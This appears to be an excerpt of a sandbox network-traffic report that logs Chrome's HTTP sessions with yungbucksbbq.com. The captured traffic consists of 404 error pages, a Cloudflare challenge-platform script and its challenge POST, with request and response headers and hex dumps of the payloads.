                                                        2024-12-25 01:23:16 UTC278INData Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                        Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                        2024-12-25 01:23:16 UTC43INData Raw: 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: to handle the request.</p></body></html>
                                                        2024-12-25 01:23:16 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                        Data Ascii: 1
                                                        2024-12-25 01:23:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.449792104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:19 UTC1049OUTGET /favicon.ico HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://yungbucksbbq.com/portbiz/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:19 UTC1077INHTTP/1.1 404 Not Found
                                                        Date: Wed, 25 Dec 2024 01:23:19 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutable
                                                        Pragma: public
                                                        CF-Cache-Status: HIT
                                                        Age: 144119
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PAvOKoDfy1rHRiV%2F1HZdNRcubJkVzbzRRueR%2BApUay%2FU2r1ojCDAYKL00B1AIceZk%2B76QHkHWL8MS6pUgzsl70kcgZgREWodHkwomc8H7ZiYRLOeKLJS%2B5As%2FjZNYJxirN0A"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75066eef700f5b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1626&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1627&delivery_rate=1742243&cwnd=218&unsent_bytes=0&cid=b83b0f0d999049fe&ts=458&x=0"
                                                        2024-12-25 01:23:19 UTC264INData Raw: 31 30 31 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e
                                                        Data Ascii: 101<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body>
                                                        2024-12-25 01:23:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.449793104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:19 UTC998OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js? HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:19 UTC896INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:19 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 8738
                                                        Connection: close
                                                        cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                        x-content-type-options: nosniff
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uAFW8Fi5sjt%2Ff54fVrtRzNSv8BYPoeEAIfNbkabIcippx%2FUWbutgtGvEz%2BEO1SP7bwRr5VvCju5RaULxCxoIeSiVhP3ZI8RKQZeGDDz9z%2BMVOnh2kaJlDnB%2FIl%2BKs293Kgp5"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75066eecf8c34f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1465&rtt_var=553&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1598&delivery_rate=1970310&cwnd=181&unsent_bytes=0&cid=06a0abe5d8b6a60f&ts=456&x=0"
                                                        2024-12-25 01:23:19 UTC473INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6e 2c 6f 2c 79 2c 7a 2c 42 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 56 2c 65 2c 66 29 7b 66 6f 72 28 56 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 56 28 35 33 34 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 56 28 35 30 37 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 34 39 35 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 56 28 35 30 32 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 35 38 38 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 56 28 35 34 36 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 56 28 35 34 32 29 29 2f 37 2a 28 70 61 72
                                                        Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(534))/1*(parseInt(V(507))/2)+-parseInt(V(495))/3+parseInt(V(502))/4+-parseInt(V(588))/5*(parseInt(V(546))/6)+parseInt(V(542))/7*(par
                                                        2024-12-25 01:23:19 UTC1369INData Raw: 57 28 35 32 35 29 5d 3d 27 6e 27 2c 6e 5b 57 28 35 33 32 29 5d 3d 27 49 27 2c 6e 5b 57 28 35 36 38 29 5d 3d 27 62 27 2c 6f 3d 6e 2c 68 5b 57 28 35 33 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 48 2c 61 38 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 61 38 3d 57 2c 6e 75 6c 6c 3d 3d 3d 46 7c 7c 76 6f 69 64 20 30 3d 3d 3d 46 29 72 65 74 75 72 6e 20 48 3b 66 6f 72 28 4a 3d 78 28 46 29 2c 45 5b 61 38 28 34 39 33 29 5d 5b 61 38 28 35 36 33 29 5d 26 26 28 4a 3d 4a 5b 61 38 28 35 35 32 29 5d 28 45 5b 61 38 28 34 39 33 29 5d 5b 61 38 28 35 36 33 29 5d 28 46 29 29 29 2c 4a 3d 45 5b 61 38 28 35 39 30 29 5d 5b 61 38 28 35 31 35 29 5d 26 26 45 5b 61 38 28 35 32 30 29 5d 3f 45 5b 61 38 28 35 39 30 29 5d 5b 61 38 28 35 31 35 29 5d 28 6e 65 77 20 45
                                                        Data Ascii: W(525)]='n',n[W(532)]='I',n[W(568)]='b',o=n,h[W(536)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,null===F||void 0===F)return H;for(J=x(F),E[a8(493)][a8(563)]&&(J=J[a8(552)](E[a8(493)][a8(563)](F))),J=E[a8(590)][a8(515)]&&E[a8(520)]?E[a8(590)][a8(515)](new E
                                                        2024-12-25 01:23:19 UTC1369INData Raw: 31 29 5d 5b 61 65 28 34 39 32 29 5d 5b 61 65 28 34 38 39 29 5d 28 49 2c 54 29 29 4b 3d 54 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 65 28 35 34 31 29 5d 5b 61 65 28 34 39 32 29 5d 5b 61 65 28 34 38 39 29 5d 28 4a 2c 4b 29 29 7b 69 66 28 32 35 36 3e 4b 5b 61 65 28 34 39 34 29 5d 28 30 29 29 7b 66 6f 72 28 48 3d 30 3b 48 3c 4e 3b 50 3c 3c 3d 31 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 65 28 35 35 30 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 48 2b 2b 29 3b 66 6f 72 28 55 3d 4b 5b 61 65 28 34 39 34 29 5d 28 30 29 2c 48 3d 30 3b 38 3e 48 3b 50 3d 55 26 31 7c 50 3c 3c 31 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 61 65 28 35 35 30 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 7d 65 6c 73 65
                                                        Data Ascii: 1)][ae(492)][ae(489)](I,T))K=T;else{if(Object[ae(541)][ae(492)][ae(489)](J,K)){if(256>K[ae(494)](0)){for(H=0;H<N;P<<=1,F-1==Q?(Q=0,O[ae(550)](G(P)),P=0):Q++,H++);for(U=K[ae(494)](0),H=0;8>H;P=U&1|P<<1,Q==F-1?(Q=0,O[ae(550)](G(P)),P=0):Q++,U>>=1,H++);}else
                                                        2024-12-25 01:23:19 UTC1369INData Raw: 3f 6e 75 6c 6c 3a 65 2e 69 28 45 5b 61 66 28 35 30 35 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 61 67 29 7b 72 65 74 75 72 6e 20 61 67 3d 61 66 2c 45 5b 61 67 28 34 39 34 29 5d 28 46 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 61 68 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 55 2c 54 29 7b 66 6f 72 28 61 68 3d 61 63 2c 48 3d 5b 5d 2c 49 3d 34 2c 4a 3d 34 2c 4b 3d 33 2c 4c 3d 5b 5d 2c 4f 3d 47 28 30 29 2c 50 3d 46 2c 51 3d 31 2c 4d 3d 30 3b 33 3e 4d 3b 48 5b 4d 5d 3d 4d 2c 4d 2b 3d 31 29 3b 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 68 28 34 38 32 29 5d 28 32 2c 32 29 2c 4e 3d 31 3b 4e 21 3d 53 3b 54 3d 4f 26 50 2c 50 3e 3e 3d 31 2c 30 3d 3d 50 26 26 28 50 3d 46 2c 4f 3d 47
                                                        Data Ascii: ?null:e.i(E[af(505)],32768,function(F,ag){return ag=af,E[ag(494)](F)})},'i':function(E,F,G,ah,H,I,J,K,L,M,N,O,P,Q,R,S,U,T){for(ah=ac,H=[],I=4,J=4,K=3,L=[],O=G(0),P=F,Q=1,M=0;3>M;H[M]=M,M+=1);for(R=0,S=Math[ah(482)](2,2),N=1;N!=S;T=O&P,P>>=1,0==P&&(P=F,O=G
                                                        2024-12-25 01:23:19 UTC1369INData Raw: 29 72 65 74 75 72 6e 3b 28 64 3d 21 5b 5d 2c 65 3d 63 5b 61 69 28 34 38 36 29 5d 3d 3d 3d 21 21 5b 5d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 6a 2c 46 29 7b 28 61 6a 3d 61 69 2c 21 64 29 26 26 28 64 3d 21 21 5b 5d 2c 46 3d 41 28 29 2c 6c 28 46 2e 72 2c 66 75 6e 63 74 69 6f 6e 28 47 29 7b 44 28 63 2c 47 29 7d 29 2c 46 2e 65 26 26 6d 28 61 6a 28 35 38 34 29 2c 46 2e 65 29 29 7d 2c 69 5b 61 69 28 35 30 31 29 5d 21 3d 3d 61 69 28 35 39 39 29 29 3f 66 28 29 3a 68 5b 61 69 28 35 33 30 29 5d 3f 69 5b 61 69 28 35 33 30 29 5d 28 61 69 28 35 37 39 29 2c 66 29 3a 28 45 3d 69 5b 61 69 28 34 39 39 29 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 5b 61 69 28 34 39 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 6b 29 7b 61 6b 3d 61 69 2c 45 28 29 2c 69 5b 61 6b 28 35 30
                                                        Data Ascii: )return;(d=![],e=c[ai(486)]===!![],f=function(aj,F){(aj=ai,!d)&&(d=!![],F=A(),l(F.r,function(G){D(c,G)}),F.e&&m(aj(584),F.e))},i[ai(501)]!==ai(599))?f():h[ai(530)]?i[ai(530)](ai(579),f):(E=i[ai(499)]||function(){},i[ai(499)]=function(ak){ak=ai,E(),i[ak(50
                                                        2024-12-25 01:23:19 UTC1369INData Raw: 61 33 28 35 35 38 29 5d 28 27 2b 27 2c 61 33 28 35 30 34 29 29 2c 4b 5b 61 33 28 35 37 35 29 5d 28 27 76 5f 27 2b 49 2e 72 2b 27 3d 27 2b 50 29 7d 63 61 74 63 68 28 51 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 63 2c 64 2c 5a 2c 65 2c 66 2c 45 2c 46 29 7b 5a 3d 57 2c 65 3d 68 5b 5a 28 34 38 37 29 5d 2c 66 3d 65 2e 72 2c 45 3d 7b 27 77 70 27 3a 42 5b 5a 28 35 37 37 29 5d 28 4a 53 4f 4e 5b 5a 28 35 35 34 29 5d 28 63 29 29 2c 27 73 27 3a 5a 28 35 34 38 29 7d 2c 46 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 46 5b 5a 28 35 31 38 29 5d 28 5a 28 35 33 33 29 2c 5a 28 35 30 36 29 2b 68 5b 5a 28 35 35 33 29 5d 5b 5a 28 36 30 30 29 5d 2b 5a 28 35 37 32 29 2b 66 29 2c 46 5b 5a 28 35 32 36 29 5d 28 5a 28 35 30 38 29 2c 5a 28 35 31 32 29 29 2c
                                                        Data Ascii: a3(558)]('+',a3(504)),K[a3(575)]('v_'+I.r+'='+P)}catch(Q){}}function l(c,d,Z,e,f,E,F){Z=W,e=h[Z(487)],f=e.r,E={'wp':B[Z(577)](JSON[Z(554)](c)),'s':Z(548)},F=new XMLHttpRequest(),F[Z(518)](Z(533),Z(506)+h[Z(553)][Z(600)]+Z(572)+f),F[Z(526)](Z(508),Z(512)),
                                                        2024-12-25 01:23:19 UTC1369INData Raw: 53 5a 38 55 52 36 46 44 36 78 41 6c 64 70 35 34 59 55 42 31 4c 67 42 4d 55 2f 2c 62 6f 6f 6c 65 61 6e 2c 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2c 35 30 31 32 31 39 39 4a 70 63 4f 79 56 2c 63 61 74 63 68 2c 2f 6a 73 64 2f 72 2f 2c 69 73 41 72 72 61 79 2c 63 68 6c 41 70 69 41 43 43 48 2c 73 65 6e 64 2c 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 2c 78 59 4c 59 69 63 67 70 55 2c 69 66 72 61 6d 65 2c 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 2c 65 72 72 6f 72 49 6e 66 6f 4f 62 6a 65 63 74 2c 69 6e 64 65 78 4f 66 2c 63 68 6c 41 70 69 43 6c 69 65 6e 74 56 65 72 73 69 6f 6e 2c 57 68 63 77 78 61 55 31 4d 56 59 2b 45 74 62 6b 53 6f 58 34 47 33 48 69 50 73 76 75 39 4c 72 30 38 6a 37 5a 36 79 65 64 4b 6c 44 71 35 7a 43 66 70 42 67 41 4a 24 6d 6e 46 4f 51 52 4e 2d
                                                        Data Ascii: SZ8UR6FD6xAldp54YUB1LgBMU/,boolean,contentWindow,5012199JpcOyV,catch,/jsd/r/,isArray,chlApiACCH,send,createElement,xYLYicgpU,iframe,DOMContentLoaded,errorInfoObject,indexOf,chlApiClientVersion,WhcwxaU1MVY+EtbkSoX4G3HiPsvu9Lr08j7Z6yedKlDq5zCfpBgAJ$mnFOQRN-
                                                        2024-12-25 01:23:19 UTC51INData Raw: 28 36 30 31 29 2c 47 5b 61 6c 28 35 30 30 29 5d 3d 66 2c 68 5b 61 6c 28 35 32 39 29 5d 5b 61 6c 28 35 33 38 29 5d 28 47 2c 27 2a 27 29 29 29 7d 7d 28 29
                                                        Data Ascii: (601),G[al(500)]=f,h[al(529)][al(538)](G,'*')))}}()


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.449797104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:22 UTC1073OUTPOST /cdn-cgi/challenge-platform/h/b/jsd/r/8f7506295d20727b HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        Content-Length: 15803
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Content-Type: application/json
                                                        Accept: */*
                                                        Origin: https://yungbucksbbq.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:22 UTC15803OUTData Raw: 7b 22 77 70 22 3a 22 74 46 4d 38 77 63 68 39 77 76 4d 77 50 61 45 68 6d 68 41 57 2b 38 63 42 57 55 6a 57 58 67 58 53 53 63 39 68 24 6b 57 78 4a 42 6e 4a 56 4d 57 36 78 4e 47 45 4a 76 68 64 57 50 6d 4d 31 35 46 46 57 55 5a 53 57 62 57 53 42 53 4d 68 57 72 53 68 65 45 2d 38 5a 76 46 43 66 30 38 78 4a 6f 46 6a 55 7a 64 41 61 31 75 38 65 6f 77 79 6a 4f 68 7a 6b 78 5a 58 57 77 4d 4d 73 58 36 63 43 35 57 33 31 35 56 4b 43 57 4b 38 61 36 57 63 79 4d 57 58 38 63 63 38 6f 50 38 58 57 68 4a 57 2b 76 37 57 68 4f 43 57 59 51 39 55 31 46 4e 68 55 5a 35 4d 57 63 51 43 57 63 45 47 2b 57 47 63 57 68 43 72 56 70 4d 30 64 6a 42 63 31 63 68 4b 65 6a 46 6b 77 6f 49 69 4b 78 57 67 38 63 58 52 4c 46 57 39 37 46 4a 61 56 78 6c 72 31 57 47 69 4b 5a 6f 67 55 38 57 70 5a 67 56 58
                                                        Data Ascii: {"wp":"tFM8wch9wvMwPaEhmhAW+8cBWUjWXgXSSc9h$kWxJBnJVMW6xNGEJvhdWPmM15FFWUZSWbWSBSMhWrSheE-8ZvFCf08xJoFjUzdAa1u8eowyjOhzkxZXWwMMsX6cC5W315VKCWK8a6WcyMWX8cc8oP8XWhJW+v7WhOCWYQ9U1FNhUZ5MWcQCWcEG+WGcWhCrVpM0djBc1chKejFkwoIiKxWg8cXRLFW97FJaVxlr1WGiKZogU8WpZgVX
                                                        2024-12-25 01:23:22 UTC1292INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:22 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 0
                                                        Connection: close
                                                        Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.yungbucksbbq.com; Priority=High; HttpOnly; Secure; SameSite=None
                                                        Set-Cookie: cf_clearance=pWJ1d.eMhdlbJUcRYFSjJI9YCM_wIHRBvhjFXkg7SV0-1735089802-1.2.1.1-3158cFY7kXYzu3_dqIeM3s0AHp.XaC4zd1qhxv4XvcFn3Ad6EQB52qFD3czPsTkXQr2_cdJ4oYBGfYGXx2IClyVx6jw1vjKmKOY5avL74o56dnWjTYXljig_9ftfTuKh29yzpt8Ggycy4gorY7sFJO9l7XmXAcGlP42kDOHrf71RznHme3EcTwdqv5SHFYxzwgdwADBKymS2hhgBQ7yx_lYJrw3K6pVPfPbO4zjhEsHh26nPKKTqOsxqG1xK_ssHCPfDVthGiLhPlHnSHNBi1XWyCIXi57spggWV4HE_bQvI9WGx9NWs43T_efhGXeNQh8G5_i8PirAOUsifd.yC5qFc5mCCDxtmKo0YuEpR1frM70jiMTrfmO170In0H7tK; Path=/; Expires=Thu, 25-Dec-25 01:23:22 GMT; Domain=.yungbucksbbq.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSae%2FPvDViVNzZ1Dz67TD%2F4i4o4bjcMfByOZ6JG%2FMx3u22xJ2W34gXBlDyHEOpUHMxsHmDxCDUmyDM1w%2FjPGhaii2uHNIBPLGGoowpgEIBVBTCh8TY%2FCkxZ3s4P0MRNCQcoB"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f750680f8c7729f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-12-25 01:23:22 UTC218INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 31 37 26 6d 69 6e 5f 72 74 74 3d 31 39 31 36 26 72 74 74 5f 76 61 72 3d 37 32 32 26 73 65 6e 74 3d 39 26 72 65 63 76 3d 32 30 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 34 30 26 72 65 63 76 5f 62 79 74 65 73 3d 31 37 34 39 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 35 31 32 31 36 39 26 63 77 6e 64 3d 31 36 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 32 36 31 66 66 63 64 39 35 65 61 62 30 66 32 35 26 74 73 3d 35 32 35 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1916&rtt_var=722&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2840&recv_bytes=17498&delivery_rate=1512169&cwnd=169&unsent_bytes=0&cid=261ffcd95eab0f25&ts=525&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.449798104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:22 UTC857OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js? HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
